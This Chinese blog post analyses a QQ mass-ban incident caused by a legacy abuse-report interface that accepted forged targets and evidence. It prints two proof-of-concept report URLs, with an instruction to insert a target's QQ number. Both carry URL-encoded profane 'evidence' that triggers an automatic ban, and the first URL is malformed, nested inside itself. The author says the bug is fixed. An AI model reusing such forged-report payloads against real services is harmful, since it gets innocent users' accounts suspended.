QQ大规模封号事件分析

相关阅读

杂谈

最近两天QQ出现了大规模封号的情况,当然,我在推送群里的几个QQ也被封了,自己用的大号还健在。

结果就有热心网友找到了漏洞相关的POC,先对马叔叔(10001)进行了一波尝试,结果发现没有效果。

然后就拿我大号进行了测试,当时,我正好在吃饭,结果GG了……

图片[1]-QQ大规模封号事件分析-FancyPig's blog

热心网友还进行了录屏……

相关的分析我们很早在猪猪粉里有分享

漏洞产生的原因

  • 客户端版本较多导致可能存在一些没有废弃的旧版接口
  • 可以在URL中修改eviluintext_evidence字段,就可以修改要举报的QQ号证据

漏洞POC

目前看应该是已经和谐了,我们将其中的URL也分享出来供大家学习参考

漏洞URL样本一

您需要将QQ号替换为目标的QQ号

https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A

我们分析下上面的一些字段,目标QQ号使用的是eviluin,举报证据字段如下

text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;

通过URL解码,我们可以看到里面有一些关键词,正是命中了这些关键词导致的用户被立刻封号

图片[2]-QQ大规模封号事件分析-FancyPig's blog

漏洞URL样本二

QQ号需要修改为目标QQ号

https://jubao.qq.com/uniform_impeach/impeach_entry?system=PC&version=5887&appname=PCQQ&appid=2400002&subapp=group_vote&scene=20001&uintype=1&eviluin=QQ号&evilnick=%E7%8C%AA%E7%8C%AA%E4%BE%A0&srv_para=chatmsg:&text_evidence=%E6%8A%95%E7%A5%A8%E6%A0%87%E9%A2%98:%E7%99%BE%E5%AE%B6%E4%B9%90;%E9%80%89%E9%A1%B91:%E6%93%8D%E4%BD%A0%E6%AF%8Dk%E4%BD%A0b%E6%AD%BBb;%E9%80%89%E9%A1%B91;&img_evidence=&url_evidence=&video_evidence=&file_evidence=&audio_evidence=&user_input_param=&cryptograph=5773555d36d3e9fecc805877688f24af&salt=e9db1f69eb6c5cf54f8312227f405bcc&seqid=1037948812520221013&is_fake=0&impeach_tel=1&3eeaade917a2c33cc4710031c653b2bd885cbb42&input=%E7%A1%AE%E5%AE%9A

以上两个样本可以造成封号1、7天,其实就是利用了这些字段可以随意修改,而且大概率是从旧版电脑QQ上遗留的部分功能导致的。因此,做安全喜欢考古是一个很不错的思路,比方说从以前的老版本的应用上寻找一些可能还遗留的接口进行参数篡改,就会导致网上说的这种无违规(wwg)封号的情况

POC验证

在输入上面的URL,在手机客户端访问后,可以看到举报成功

图片[3]-QQ大规模封号事件分析-FancyPig's blog

当然我自己的号也不例外,被热心网友安排了一天的套餐

图片[4]-QQ大规模封号事件分析-FancyPig's blog

你可以去安全中心,输入对应的QQ检测封号情况

https://accounts.qq.com/login/limit

目前可以看到很多大佬的QQ都因为这个漏洞被临时封禁了

图片[5]-QQ大规模封号事件分析-FancyPig's blog

很多短位或者靓号也被热心网友给搞封了

图片[6]-QQ大规模封号事件分析-FancyPig's blog
图片[7]-QQ大规模封号事件分析-FancyPig's blog

这个漏洞目前应该是已经修复了,而且通过这个漏洞被封禁的账户现在也都解封了

© 版权声明
THE END
喜欢就支持一下吧
点赞27赞赏 分享
评论 共21条

请登录后发表评论